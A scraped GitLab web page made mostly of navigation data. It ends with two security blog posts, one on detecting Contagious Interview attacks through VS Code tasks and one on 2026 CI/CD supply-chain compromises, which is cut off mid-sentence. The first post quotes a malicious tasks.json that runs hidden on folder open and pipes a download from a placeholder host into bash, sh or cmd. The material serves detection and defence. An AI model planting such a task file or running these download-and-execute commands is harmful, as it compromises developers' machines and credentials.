resources",{"href":203,"dataGaName":198,"dataGaLocation":44},"/resources/",[205,238,260],{"title":206,"items":207},"Getting started",[208,213,218,223,228,233],{"text":209,"config":210},"Install",{"href":211,"dataGaName":212,"dataGaLocation":44},"/install/","install",{"text":214,"config":215},"Quick start guides",{"href":216,"dataGaName":217,"dataGaLocation":44},"/get-started/","quick setup checklists",{"text":219,"config":220},"Learn",{"href":221,"dataGaLocation":44,"dataGaName":222},"https://university.gitlab.com/","learn",{"text":224,"config":225},"Product documentation",{"href":226,"dataGaName":227,"dataGaLocation":44},"https://docs.gitlab.com/","product documentation",{"text":229,"config":230},"Best practice videos",{"href":231,"dataGaName":232,"dataGaLocation":44},"/getting-started-videos/","best practice videos",{"text":234,"config":235},"Integrations",{"href":236,"dataGaName":237,"dataGaLocation":44},"/integrations/","integrations",{"title":239,"items":240},"Discover",[241,246,251,255],{"text":242,"config":243},"Customer success stories",{"href":244,"dataGaName":245,"dataGaLocation":44},"/customers/","customer success stories",{"text":247,"config":248},"Blog",{"href":249,"dataGaName":250,"dataGaLocation":44},"/blog/","blog",{"text":252,"config":253},"The Source",{"href":254,"dataGaName":250,"dataGaLocation":44},"/the-source/",{"text":256,"config":257},"Remote",{"href":258,"dataGaName":259,"dataGaLocation":44},"https://handbook.gitlab.com/handbook/company/culture/all-remote/","remote",{"title":261,"items":262},"Connect",[263,268,273,278,283],{"text":264,"config":265},"GitLab Services",{"href":266,"dataGaName":267,"dataGaLocation":44},"/services/","services",{"text":269,"config":270},"Community",{"href":271,"dataGaName":272,"dataGaLocation":44},"/community/","community",{"text":274,"config":275},"Forum",{"href":276,"dataGaName":277,"dataGaLocation":44},"https://forum.gitlab.com/","forum",{"text":279,"config":280},"Events",{"href":281,"dataGaName":282,"dataGaLocation":44},"/events/","events",{"text":284,"config":285},"Partners",{"href":286,"dataGaName":287,"dataGaLocation":44},"/partners/","partners",{"config":289,"title":292,"text":293,"link":294},{"background":290,"textColor":291},"url('https://res.cloudinary.com/about-gitlab-com/image/upload/v1777322348/qpq8yrgn8knii57omj0c.png')","#000","What’s new in GitLab","Stay updated with our latest features and improvements.",{"text":295,"config":296},"Read the latest",{"href":297,"dataGaName":298,"dataGaLocation":44},"/releases/whats-new/","whats new",{"text":300,"config":301,"menu":303},"Company",{"dataNavLevelOne":302},"company",{"type":95,"columns":304},[305],{"items":306},[307,312,318,320,325,330,335,340,345,350,355],{"text":308,"config":309},"About",{"href":310,"dataGaName":311,"dataGaLocation":44},"/company/","about",{"text":313,"config":314,"footerGa":317},"Jobs",{"href":315,"dataGaName":316,"dataGaLocation":44},"/jobs/","jobs",{"dataGaName":316},{"text":279,"config":319},{"href":281,"dataGaName":282,"dataGaLocation":44},{"text":321,"config":322},"Leadership",{"href":323,"dataGaName":324,"dataGaLocation":44},"/company/team/e-group/","leadership",{"text":326,"config":327},"Team",{"href":328,"dataGaName":329,"dataGaLocation":44},"/company/team/","team",{"text":331,"config":332},"Handbook",{"href":333,"dataGaName":334,"dataGaLocation":44},"https://handbook.gitlab.com/","handbook",{"text":336,"config":337},"Investor relations",{"href":338,"dataGaName":339,"dataGaLocation":44},"https://ir.gitlab.com/","investor relations",{"text":341,"config":342},"Trust Center",{"href":343,"dataGaName":344,"dataGaLocation":44},"/security/","trust center",{"text":346,"config":347},"AI Transparency Center",{"href":348,"dataGaName":349,"dataGaLocation":44},"/ai-transparency-center/","ai transparency center",{"text":351,"config":352},"Newsletter",{"href":353,"dataGaName":354,"dataGaLocation":44},"/company/contact/#contact-forms","newsletter",{"text":356,"config":357},"Press",{"href":358,"dataGaName":359,"dataGaLocation":44},"/press/","press",{"text":361,"config":362,"menu":363},"Contact us",{"dataNavLevelOne":302},{"type":95,"columns":364},[365],{"items":366},[367,370,375],{"text":51,"config":368},{"href":53,"dataGaName":369,"dataGaLocation":44},"talk to sales",{"text":371,"config":372},"Support portal",{"href":373,"dataGaName":374,"dataGaLocation":44},"https://support.gitlab.com","support portal",{"text":376,"config":377},"Customer portal",{"href":378,"dataGaName":379,"dataGaLocation":44},"https://customers.gitlab.com/customers/sign_in/","customer portal",{"close":381,"login":382,"suggestions":389},"Close",{"text":383,"link":384},"To search repositories and projects, login to",{"text":385,"config":386},"gitlab.com",{"href":58,"dataGaName":387,"dataGaLocation":388},"search login","search",{"text":390,"default":391},"Suggestions",[392,394,398,400,404,408],{"text":75,"config":393},{"href":80,"dataGaName":75,"dataGaLocation":388},{"text":395,"config":396},"Code Suggestions (AI)",{"href":397,"dataGaName":395,"dataGaLocation":388},"/solutions/code-suggestions/",{"text":111,"config":399},{"href":113,"dataGaName":111,"dataGaLocation":388},{"text":401,"config":402},"GitLab on AWS",{"href":403,"dataGaName":401,"dataGaLocation":388},"/partners/technology-partners/aws/",{"text":405,"config":406},"GitLab on Google Cloud",{"href":407,"dataGaName":405,"dataGaLocation":388},"/partners/technology-partners/google-cloud-platform/",{"text":409,"config":410},"Why GitLab?",{"href":88,"dataGaName":409,"dataGaLocation":388},{"freeTrial":412,"mobileIcon":417,"desktopIcon":422,"secondaryButton":425},{"text":413,"config":414},"Start free trial",{"href":415,"dataGaName":49,"dataGaLocation":416},"https://gitlab.com/-/trials/new/","nav",{"altText":418,"config":419},"Gitlab Icon",{"src":420,"dataGaName":421,"dataGaLocation":416},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203874/jypbw1jx72aexsoohd7x.svg","gitlab icon",{"altText":418,"config":423},{"src":424,"dataGaName":421,"dataGaLocation":416},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203875/gs4c8p8opsgvflgkswz9.svg",{"text":426,"config":427},"Get Started",{"href":428,"dataGaName":429,"dataGaLocation":416},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com/get-started/","get started",{"freeTrial":431,"mobileIcon":435,"desktopIcon":437},{"text":432,"config":433},"Learn more about GitLab Duo",{"href":80,"dataGaName":434,"dataGaLocation":416},"gitlab duo",{"altText":418,"config":436},{"src":420,"dataGaName":421,"dataGaLocation":416},{"altText":418,"config":438},{"src":424,"dataGaName":421,"dataGaLocation":416},{"button":440,"mobileIcon":445,"desktopIcon":447},{"text":441,"config":442},"/switch",{"href":443,"dataGaName":444,"dataGaLocation":416},"#contact","switch",{"altText":418,"config":446},{"src":420,"dataGaName":421,"dataGaLocation":416},{"altText":418,"config":448},{"src":449,"dataGaName":421,"dataGaLocation":416},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1773335277/ohhpiuoxoldryzrnhfrh.png",{"freeTrial":451,"mobileIcon":456,"desktopIcon":458},{"text":452,"config":453},"Back to pricing",{"href":193,"dataGaName":454,"dataGaLocation":416,"icon":455},"back to pricing","GoBack",{"altText":418,"config":457},{"src":420,"dataGaName":421,"dataGaLocation":416},{"altText":418,"config":459},{"src":424,"dataGaName":421,"dataGaLocation":416},{"title":461,"button":462,"config":467},"See how agentic AI transforms software delivery",{"text":463,"config":464},"Sign up for GitLab Transcend on June 10",{"href":465,"dataGaName":466,"dataGaLocation":44},"/releases/whats-new/#sign-up","transcend event",{"layout":468,"icon":469,"disabled":32},"release","AiStar",{"data":471},{"text":472,"source":473,"edit":479,"contribute":484,"config":489,"items":494,"minimal":701},"Git is a trademark of Software Freedom Conservancy and our use of 'GitLab' is under license",{"text":474,"config":475},"View page source",{"href":476,"dataGaName":477,"dataGaLocation":478},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/","page source","footer",{"text":480,"config":481},"Edit this page",{"href":482,"dataGaName":483,"dataGaLocation":478},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/content/","web ide",{"text":485,"config":486},"Please contribute",{"href":487,"dataGaName":488,"dataGaLocation":478},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/CONTRIBUTING.md/","please contribute",{"twitter":490,"facebook":491,"youtube":492,"linkedin":493},"https://twitter.com/gitlab","https://www.facebook.com/gitlab","https://www.youtube.com/channel/UCnMGQ8QHMAnVIsI3xJrihhg","https://www.linkedin.com/company/gitlab-com",[495,542,596,640,667],{"title":191,"links":496,"subMenu":511},[497,501,506],{"text":498,"config":499},"View plans",{"href":193,"dataGaName":500,"dataGaLocation":478},"view plans",{"text":502,"config":503},"Why Premium?",{"href":504,"dataGaName":505,"dataGaLocation":478},"/pricing/premium/","why premium",{"text":507,"config":508},"Why Ultimate?",{"href":509,"dataGaName":510,"dataGaLocation":478},"/pricing/ultimate/","why ultimate",[512],{"title":513,"links":514},"Contact Us",[515,518,520,522,527,532,537],{"text":516,"config":517},"Contact sales",{"href":53,"dataGaName":54,"dataGaLocation":478},{"text":371,"config":519},{"href":373,"dataGaName":374,"dataGaLocation":478},{"text":376,"config":521},{"href":378,"dataGaName":379,"dataGaLocation":478},{"text":523,"config":524},"Status",{"href":525,"dataGaName":526,"dataGaLocation":478},"https://status.gitlab.com/","status",{"text":528,"config":529},"Terms of use",{"href":530,"dataGaName":531,"dataGaLocation":478},"/terms/","terms of use",{"text":533,"config":534},"Privacy statement",{"href":535,"dataGaName":536,"dataGaLocation":478},"/privacy/","privacy statement",{"text":538,"config":539},"Cookie preferences",{"dataGaName":540,"dataGaLocation":478,"id":541,"isOneTrustButton":13},"cookie preferences","ot-sdk-btn",{"title":91,"links":543,"subMenu":552},[544,548],{"text":545,"config":546},"DevSecOps platform",{"href":73,"dataGaName":547,"dataGaLocation":478},"devsecops platform",{"text":549,"config":550},"AI-Assisted Development",{"href":80,"dataGaName":551,"dataGaLocation":478},"ai-assisted development",[553],{"title":554,"links":555},"Topics",[556,561,566,571,576,581,586,591],{"text":557,"config":558},"CICD",{"href":559,"dataGaName":560,"dataGaLocation":478},"/topics/ci-cd/","cicd",{"text":562,"config":563},"GitOps",{"href":564,"dataGaName":565,"dataGaLocation":478},"/topics/gitops/","gitops",{"text":567,"config":568},"DevOps",{"href":569,"dataGaName":570,"dataGaLocation":478},"/topics/devops/","devops",{"text":572,"config":573},"Version Control",{"href":574,"dataGaName":575,"dataGaLocation":478},"/topics/version-control/","version control",{"text":577,"config":578},"DevSecOps",{"href":579,"dataGaName":580,"dataGaLocation":478},"/topics/devsecops/","devsecops",{"text":582,"config":583},"Cloud Native",{"href":584,"dataGaName":585,"dataGaLocation":478},"/topics/cloud-native/","cloud native",{"text":587,"config":588},"AI for Coding",{"href":589,"dataGaName":590,"dataGaLocation":478},"/topics/devops/ai-for-coding/","ai for coding",{"text":592,"config":593},"Agentic AI",{"href":594,"dataGaName":595,"dataGaLocation":478},"/topics/agentic-ai/","agentic ai",{"title":597,"links":598},"Solutions",[599,601,603,608,612,615,619,622,624,627,630,635],{"text":135,"config":600},{"href":130,"dataGaName":135,"dataGaLocation":478},{"text":124,"config":602},{"href":107,"dataGaName":108,"dataGaLocation":478},{"text":604,"config":605},"Agile development",{"href":606,"dataGaName":607,"dataGaLocation":478},"/solutions/agile-delivery/","agile delivery",{"text":609,"config":610},"SCM",{"href":120,"dataGaName":611,"dataGaLocation":478},"source code management",{"text":557,"config":613},{"href":113,"dataGaName":614,"dataGaLocation":478},"continuous integration & delivery",{"text":616,"config":617},"Value stream management",{"href":163,"dataGaName":618,"dataGaLocation":478},"value stream management",{"text":562,"config":620},{"href":621,"dataGaName":565,"dataGaLocation":478},"/solutions/gitops/",{"text":173,"config":623},{"href":176,"dataGaName":177,"dataGaLocation":478},{"text":625,"config":626},"Small business",{"href":182,"dataGaName":183,"dataGaLocation":478},{"text":628,"config":629},"Public sector",{"href":188,"dataGaName":189,"dataGaLocation":478},{"text":631,"config":632},"Education",{"href":633,"dataGaName":634,"dataGaLocation":478},"/solutions/education/","education",{"text":636,"config":637},"Financial services",{"href":638,"dataGaName":639,"dataGaLocation":478},"/solutions/finance/","financial services",{"title":196,"links":641},[642,644,646,648,651,653,655,657,659,661,663,665],{"text":209,"config":643},{"href":211,"dataGaName":212,"dataGaLocation":478},{"text":214,"config":645},{"href":216,"dataGaName":217,"dataGaLocation":478},{"text":219,"config":647},{"href":221,"dataGaName":222,"dataGaLocation":478},{"text":224,"config":649},{"href":226,"dataGaName":650,"dataGaLocation":478},"docs",{"text":247,"config":652},{"href":249,"dataGaName":250,"dataGaLocation":478},{"text":242,"config":654},{"href":244,"dataGaName":245,"dataGaLocation":478},{"text":256,"config":656},{"href":258,"dataGaName":259,"dataGaLocation":478},{"text":264,"config":658},{"href":266,"dataGaName":267,"dataGaLocation":478},{"text":269,"config":660},{"href":271,"dataGaName":272,"dataGaLocation":478},{"text":274,"config":662},{"href":276,"dataGaName":277,"dataGaLocation":478},{"text":279,"config":664},{"href":281,"dataGaName":282,"dataGaLocation":478},{"text":284,"config":666},{"href":286,"dataGaName":287,"dataGaLocation":478},{"title":300,"links":668},[669,671,673,675,677,679,681,685,690,692,694,696],{"text":308,"config":670},{"href":310,"dataGaName":302,"dataGaLocation":478},{"text":313,"config":672},{"href":315,"dataGaName":316,"dataGaLocation":478},{"text":321,"config":674},{"href":323,"dataGaName":324,"dataGaLocation":478},{"text":326,"config":676},{"href":328,"dataGaName":329,"dataGaLocation":478},{"text":331,"config":678},{"href":333,"dataGaName":334,"dataGaLocation":478},{"text":336,"config":680},{"href":338,"dataGaName":339,"dataGaLocation":478},{"text":682,"config":683},"Sustainability",{"href":684,"dataGaName":682,"dataGaLocation":478},"/sustainability/",{"text":686,"config":687},"Diversity, inclusion and belonging (DIB)",{"href":688,"dataGaName":689,"dataGaLocation":478},"/diversity-inclusion-belonging/","Diversity, inclusion and belonging",{"text":341,"config":691},{"href":343,"dataGaName":344,"dataGaLocation":478},{"text":351,"config":693},{"href":353,"dataGaName":354,"dataGaLocation":478},{"text":356,"config":695},{"href":358,"dataGaName":359,"dataGaLocation":478},{"text":697,"config":698},"Modern Slavery Transparency Statement",{"href":699,"dataGaName":700,"dataGaLocation":478},"https://handbook.gitlab.com/handbook/legal/modern-slavery-act-transparency-statement/","modern slavery transparency statement",{"items":702},[703,706,709],{"text":704,"config":705},"Terms",{"href":530,"dataGaName":531,"dataGaLocation":478},{"text":707,"config":708},"Cookies",{"dataGaName":540,"dataGaLocation":478,"id":541,"isOneTrustButton":13},{"text":710,"config":711},"Privacy",{"href":535,"dataGaName":536,"dataGaLocation":478},[713],{"id":714,"title":9,"body":26,"config":715,"content":717,"description":26,"extension":25,"meta":722,"navigation":13,"path":723,"seo":724,"stem":725,"__hash__":726},"blogAuthors/en-us/blog/authors/evan-baltman.yml",{"template":716},"BlogAuthor",{"name":9,"config":718},{"headshot":719,"socialProof":720},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1777579628/fkgn1kh0c1ndgba9yrkq.png",{"gitlabHandle":721},"ebaltman",{},"/en-us/blog/authors/evan-baltman",{},"en-us/blog/authors/evan-baltman","lIHS0uxztwtRrA-cy594VFaaYQp9r_oqQeUFF1B8eTU",[728,742,754],{"content":729,"config":740},{"title":730,"description":731,"authors":732,"heroImage":734,"date":735,"body":736,"category":11,"tags":737},"How to detect and prevent Contagious Interview IDE attacks","Learn how we built custom controls that detect and prevent malware campaigns like those used for Contagious Interview and how to deploy them in your environment.",[733],"Josh Feehs","https://res.cloudinary.com/about-gitlab-com/image/upload/v1774375772/kpaaaiqhokevxxeoxvu0.png","2026-05-04","Recently, GitLab's Threat Intelligence team, part of the Security Operations team, published an [extensive article](https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/) revealing North Korean tradecraft and detailing ways in which GitLab has tracked and disrupted these malicious actors. Security Operations here also includes our Security Incident Response Team (SIRT), Security Logging, Signals Intelligence, and Red Team. This tight collaboration across security disciplines allows us to take tips from threat intelligence, emulate relevant threat actors via Red and Purple Team exercises, and proactively build detection and prevention techniques based on that activity.\n\nSo, in parallel with the discovery of the North Korean tradecraft and associated [Contagious Interview](https://attack.mitre.org/groups/G1052/) threat campaign, we developed custom controls to prevent similar malware campaigns, specifically those which use IDE attacks. In this article, we share those controls as well as the techniques we use to protect our customers, support the broader security community, and further thwart these malicious actors.\n\n## The threat intelligence\n\nThe North Korean tradecraft article focused on a broad set of attacks, techniques, and Indicators of Compromise (IOCs) that North Korean state actors are actively using to conduct both broad and targeted attacks. One of [the attack paths noted](https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/#_2025-campaign-trends) was the use of Visual Studio Code tasks for malware distribution. The [Contagious Interview](https://attack.mitre.org/groups/G1052/) threat campaign often relies on fake interview processes to convince their victims to download and open a code repository, enabling attack via VS Code tasks.\n\n[VS Code tasks](https://code.visualstudio.com/docs/debugtest/tasks) are a mechanism designed to automate common jobs that developers want to run when opening a repository, such as linting, building, packaging, testing, or deploying software systems. Via a simple configuration file within the repo, `tasks.json`, developers can automatically run code whenever they open their repository. Trust must be granted to the repository for these tasks to run.\n\nContagious Interview’s pretexts often rely on malicious repositories, so pivoting to using VS Code tasks for code execution is a simple continuation of their pretext. The target is prompted to download and open the malicious repository in VS Code (often for code review purposes as part of an interview). Because the victims believe they are interviewing for a job, the victim is under heavy pressure to “trust” the interviewer’s workspace, enabling the malicious task to run without their knowledge.\n\nOne example of a malicious `tasks.json` file is shown below. It is fairly simple — it detects the OS and downloads the next stage of the malware for that platform, using a `curl | bash` structure. Domains included are placeholders and not actual IOCs. Detailed IOCs for these actors were shared in our [previous blog post](https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/#appendix-2-indicators-of-compromise).\n\n\n```json\n  \"version\": \"1.0.8\",\n  \"tasks\": [\n    {\n      \"label\": \"env\",\n      \"type\": \"shell\",\n      \"osx\": {\n        \"command\": \"curl 'https://www.example[.]com/settings/mac?flag=8' | bash\"\n      },\n      \"linux\": {\n        \"command\": \"wget -q0- 'https://www.example[.]com/settings/linux?flag=8' | sh\"\n      },\n      \"windows\": {\n        \"command\": \"curl https://www.example[.]com/settings/windows?flag=8 | cmd\"\n      },\n      \"problemMatcher\": [],\n      \"presentation\": {\n        \"reveal\": \"never\",\n        \"echo\": false,\n        \"focus\": false,\n        \"close\": true,\n        \"panel\": \"dedicated\",\n        \"showReuseMessage\": false\n      },\n      \"runOptions\": {\n        \"runOn\": \"folderOpen\"\n      }\n    }\n  ]\n```\n\nThis malicious code execution is then typically used to deploy infostealers, steal passwords and cryptocurrency, and ultimately establish persistence to abuse victims’ trusted accesses to corporate networks.\n\nOnce we understood how the threat actor was gaining initial code execution, we had a target for preventative measures to catch these attacks before GitLab workstations were targeted.\n\n## Multi-faceted detection and prevention\n\nWe always want to develop detective and preventative controls that are as “low level” as possible, since these types of detections are typically more difficult to bypass. Additionally, threat intelligence indicated that other projects that forked VS Code are also vulnerable to this malicious repository attack. So, instead of focusing specifically on a VS Code detection, we wanted to find the area “closest to the operating system” where this malicious code execution could be identified. This would allow our detection techniques to detect not only exploitation via VS Code tasks, but also attacks targeting using a VS Code fork or similar IDE written in Node that has background tasks.  \n   \nReviewing VS Code source, we identified that the `node-pty.spawn()` library call is used across the product when subprocesses need to be used. The [node-pty library](https://www.npmjs.com/package/node-pty) is incredibly popular, with over a million weekly downloads at time of writing. This library enables Node applications (including Electron applications such as VS Code) to fork subprocesses from a node context, and results in calls to its own binary, `spawn-helper`. When subprocesses are launched, `spawn-helper` is spawned as a child process of the Node application calling it.\n\nAfter performing a Purple Team operation to emulate this specific attack path, we reviewed our Endpoint Detection and Response (EDR) telemetry to try to not only develop a strong detection for the emulated attack, but also to tune this detection to only alert on suspicious activity, and not on legitimate developer activity. We identified that `spawn-helper` is called in situations where VS Code wants to spawn tasks that occur in the *background*, without user visibility or interaction. Conversely, a `Code Helper` binary is called when new processes (such as the integrated Terminal) are launched in the *foreground* with user interaction.\n\nThis allows us to craft detections that only look for subprocesses spawned without the user’s knowledge, and avoid false positives that flag subprocesses a user might intentionally spawn while using their IDE.\n\nAs shown earlier, a commonly-seen malicious task contains commands that run a `curl | \u003Cshell>` from a task. Although `curl | bash` can be a legitimate way to install software like Homebrew, in our environment, it should never happen in the background without the user’s knowledge. This distinction allowed us to tune `spawn-helper`\\-based detections to not alert on *every* background task that ran, but to instead trigger only on behaviors that are uncommon and suspicious in our environment. Since implementing this detection technique, we have had no false positives, even though a large part of our organization uses VS Code daily.\n\nAlthough this article has focused on detecting `spawn-helper` in your environment, this is only one of many layers of defense that you can implement in your organization to prevent and detect these IDE task-based attacks.\n\nIn addition to using EDR instrumentation to detect a malicious task at runtime, you can proactively harden your fleet against this type of attack by pushing global configs to disable task runs in VS Code. If that is too disruptive to your developers, you can also scan your environment to enumerate how often users use trusted workspaces and trusted workspace folders within their typical VS Code usage, and run education campaigns to help inform the company about the risks posed by this Contagious Interview attack path.\n\n## Summary\n\nGitLab Security Operations works around the clock to protect our customers and our company. With our tightly coupled security teams, we are able to produce actionable threat intelligence, leverage that threat intel to inform adversary emulation operations, and ultimately develop technical and procedural prevention and detection techniques that protect our customers and company.\n\nAs VS Code tasks continue to receive visibility in the security community, it’s possible that other threat actors will attempt to use this attack path for their own ends. We hope that this small example of the work we do to protect GitLab and our customers against Advanced Persistent Threats can inspire others to do the same, and to join us in our continued mission to disrupt these threat actors. \n\n> Follow our innovation and research on our [Security Labs site](https://about.gitlab.com/blog/categories/security-labs/).",[22,23,738,739],"product","tutorial",{"featured":32,"template":14,"slug":741},"how-to-detect-and-prevent-contagious-interview-ide-attacks",{"content":743,"config":752},{"body":744,"title":745,"description":746,"category":11,"tags":747,"authors":748,"heroImage":750,"date":751},"\n***Note: The GitLab product did not use any of the compromised package versions mentioned in this post.***\n\nIn the span of 12 days, four separate supply chain attacks revealed that continuous integration and continuous delivery (CI/CD) pipelines have become a high-value target for sophisticated threat actors.\n\nBetween March 19 and March 31, 2026, threat actors compromised:\n\n* an open-source security scanner (Trivy)\n* an infrastructure-as-code (IaC) security scanner (Checkmarx KICS)\n* an AI model gateway (LiteLLM)\n* a JavaScript HTTP client (axios)\n\nEach attack shared the same surface: the build pipeline.\nThis article shows [what happened](#trusted-by-millions-compromised-in-minutes), [why pipelines can be uniquely vulnerable](#the-patterns-behind-these-attacks), and how centralized policy enforcement with GitLab — using policies defined below — can [block, detect, and contain these classes of attack](#how-gitlab-pipeline-execution-policies-address-each-attack-pattern) before they reach production.\n\n\n## Trusted by millions, compromised in minutes\n\nHere is the timeline of the supply chain attacks:\n\n### March 19: Trivy security scanner becomes an attack vector\n\n[Trivy](https://github.com/aquasecurity/trivy) is one of the most widely used open-source vulnerability scanners in the world. It is the tool teams run *inside their pipelines* to find vulnerabilities.\n\nOn March 19, a threat actor group known as [TeamPCP used compromised credentials](https://www.aquasec.com/blog/trivy-supply-chain-attack-what-you-need-to-know/) to force-push malicious code into 76 of 77 version tags of the `aquasecurity/trivy-action` GitHub Action and all 7 tags of `aquasecurity/setup-trivy`. Simultaneously, they published a trojanized Trivy binary (v0.69.4) to official distribution channels. The payload was credential-stealing malware that harvested environment variables, cloud tokens, SSH keys, and CI/CD secrets from every pipeline that ran a Trivy scan.\n\nThe incident was assigned [CVE-2026-33634](https://nvd.nist.gov/vuln/detail/CVE-2026-33634) with a CVSS score of 9.4. The Cybersecurity and Infrastructure Security Agency (CISA) added it to the Known Exploited Vulnerabilities catalog within days.\n\n### March 23: Checkmarx KICS falls next\nUsing stolen credentials, TeamPCP pivoted to Checkmarx’s open-source KICS (Keeping Infrastructure as Code Secure) project. They compromised the `ast-github-action` and `kics-github-action` GitHub Actions, [injecting the same credential-stealing malware](https://thehackernews.com/2026/03/teampcp-hacks-checkmarx-github-actions.html). Between 12:58 and 16:50 UTC on March 23, any CI/CD pipeline referencing these actions was silently exfiltrating sensitive data, such as API keys, database passwords, cloud access tokens, SSH keys, and service account credentials.\n\n### March 24: LiteLLM compromised via stolen Trivy credentials\n\nLiteLLM, an LLM API proxy with 95 million monthly downloads, was the next target. TeamPCP [published backdoored versions](https://thehackernews.com/2026/03/teampcp-backdoors-litellm-versions.html) (1.82.7 and 1.82.8) to PyPI using credentials harvested from LiteLLM’s own CI/CD pipeline, which used Trivy for scanning.\n\nThe malware targeting Version 1.82.7 used a base64-encoded payload injected directly into `litellm/proxy/proxy_server.py` that executed at import time. The version targeting 1.82.8 used a `.pth` file, a Python mechanism that executes automatically during interpreter startup. Simply installing LiteLLM was enough to trigger the payload. Attackers encrypted the stolen data (SSH keys, cloud tokens, .env files, cryptocurrency wallets) and exfiltrated it to `models.litellm.cloud`, a lookalike domain.\n\n### March 31: Source code for AI coding assistant leaked via simple packaging mistake\nWhile the TeamPCP campaign was still unfolding, a software company shipped an npm package containing a 59.8 MB source map file — one that referenced its AI coding assistant's complete, unminified TypeScript source code, hosted in the company's own Cloudflare R2 bucket.\n\nThe leak exposed 1,900 TypeScript files, 512,000+ lines of code, 44 hidden feature flags, unreleased model codenames, and the full system prompt for anyone who knew where to look. As engineer [Gabriel Anhaia explained](https://dev.to/gabrielanhaia/claude-codes-entire-source-code-was-just-leaked-via-npm-source-maps-heres-whats-inside-cjo), “A single misconfigured .npmignore or files field in package.json can expose everything.”\n### March 31: axios and another trojan in the supply chain\nThat same day, a sophisticated campaign [targeted the axios npm package](https://thehackernews.com/2026/03/axios-supply-chain-attack-pushes-cross.html), a JavaScript HTTP client with over 100 million weekly downloads.\n\nA compromised maintainer account published backdoored versions (1.14.1 and 0.30.4). It injected a malicious dependency (`plain-crypto-js@4.2.1`) that deployed a Remote Access Trojan capable of running on macOS, Windows, and Linux. Both release branches were hit within 39 minutes, with the malware designed to self-destruct after execution.\n\n## The patterns behind these attacks\n\nAcross these five incidents, three distinct attack patterns emerge, and all of them exploit the implicit trust that CI/CD pipelines place in their inputs.\n\n### Pattern 1: Poisoned tools and actions\n\nThe TeamPCP campaign exploited a fundamental assumption: that the security tools running *inside* your pipeline are themselves trustworthy. When a GitHub Action tag or a PyPI package version resolves to malicious code, the pipeline executes it with full access to environment secrets, cloud credentials, and deployment tokens. There is no verification step because the pipeline trusts the tag.\n\n**A recommended pipeline-level control:** Pin tools and actions to immutable references (commit SHAs or image digests) rather than mutable version tags. Where pinning is not practical, verify the integrity of tools and dependencies against known-good checksums or signatures. Block execution if verification fails.\n\n### Pattern 2: Packaging misconfigurations that leak IP\n\nA misconfigured build pipeline shipped debugging artifacts straight into the production package. A misconfigured `.npmignore` or files field in package.json is all it takes. A pre-publish validation step should catch this every time.\n\n**A recommended pipeline-level control:** Before any package is published, run automated checks that validate the package contents against an allowlist, flag unexpected files (source maps, internal configs, .env files), and block the publish step if the checks fail.\n\n### Pattern 3: Vulnerabilities in transitive dependencies\n\nThe axios attack targeted not just direct users of axios, but anyone whose dependency tree resolved to the compromised version. A single poisoned dependency in a lockfile can thus propagate through an entire organization’s build infrastructure.\n\n**A recommended pipeline-level control:** Compare dependency checksums against known-good lockfile state. Detect unexpected new dependencies or version changes. Block builds that introduce unverified packages.\n\n## How GitLab Pipeline Execution Policies address each attack pattern\n\nGitLab Pipeline Execution Policies ([PEPs](https://docs.gitlab.com/user/application_security/policies/pipeline_execution_policies/)) enable security and platform teams to inject mandatory CI/CD jobs into every pipeline across an organization, regardless of what a developer defines in their `.gitlab-ci.yml`. Jobs defined in PEPs cannot be skipped, even with `[skip ci]` or `[no_pipeline]` directives. Jobs can be executed in *reserved* stages (`.pipeline-policy-pre` and `.pipeline-policy-post`) that bookend the developer’s pipeline.\n\nWe have published ready-to-use pipeline execution policies for all three patterns as an open-source project: [Supply Chain Policies](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies). These policies are independently deployable, and each one ships with violation samples that you can use to test them. Here is how each one works.\n\n### Use case 1: Prevent accidental exposure in package publishing\n\n**Problem:** A source map file ended up in the npm package of an AI coding tool after the build pipeline skipped publish-time validation.\n\n**PEP approach:** We built an open-source Pipeline Execution Policy for exactly this class of error: [Artifact Hygiene](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies/-/blob/main/artifact-hygiene.gitlab-ci.yml?ref_type=heads).\n\nThe policy injects `.pipeline-policy-pre` jobs that auto-detect the artifact type (npm package, Docker image, or Helm chart) and inspect the contents before any publish step runs. For npm packages, it performs three checks:\n\n1. **File pattern blocklist.** Scans npm pack output for source maps (.map), test directories, build configs, IDE settings, and src/ directories.\n\n2. **Package size gate.** Blocks packages exceeding 50 MB, like the 59.8 MB package that leaked the AI tool.\n\n3. **sourceMappingURL scan.** Detects external URLs (the R2 bucket pattern that exposed a major AI company’s source), inline data: URIs, and local file references embedded in JavaScript bundles.\n\nWhen violations are found, the pipeline fails with a clear report in the failed CI job logs:\n```text\n=============================================\nFAILED: 3 violation(s) found\n=============================================\nBLOCKED: dist/index.js.map (matched: \\.map$)\nBLOCKED: dist/index.js contains external sourceMappingURL\nBLOCKED: dist/utils.js contains inline sourceMappingURL\n\nThis check is enforced by a Pipeline Execution Policy. If this is a false positive, contact the security team to update the policy project or exclude this project.\n```\nThe policy has no user-configurable CI variables. Developers cannot disable or bypass it. Exceptions are managed by the security team at the policy level, ensuring a deliberate process and a clean audit trail.\n\nThe repository includes a test project with intentional violations (examples/leaky-npm-package/) so you can see the policy in action before deploying it to your organization. The [README](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies/-/blob/main/README.md) includes a complete quick-start guide for setup and deployment.\n\n**What this catches:** Any one of these controls would likely have prevented the AI company's source code leak:\n\n* The source map file triggers the file pattern blocklist.\n* Its 59.8 MB size triggers the size gate.\n* The sourceMappingURL pointing to an external R2 bucket triggers the URL scan.\n\n### Use case 2: Detect dependency tampering and lockfile manipulation\n\n**Problem:** The axios attack introduced a malicious transitive dependency (`plain-crypto-js`) that executed a RAT on install. Anyone who ran npm install during the compromise window pulled in the trojan.\n\n**PEP approach:** The [Dependency Integrity 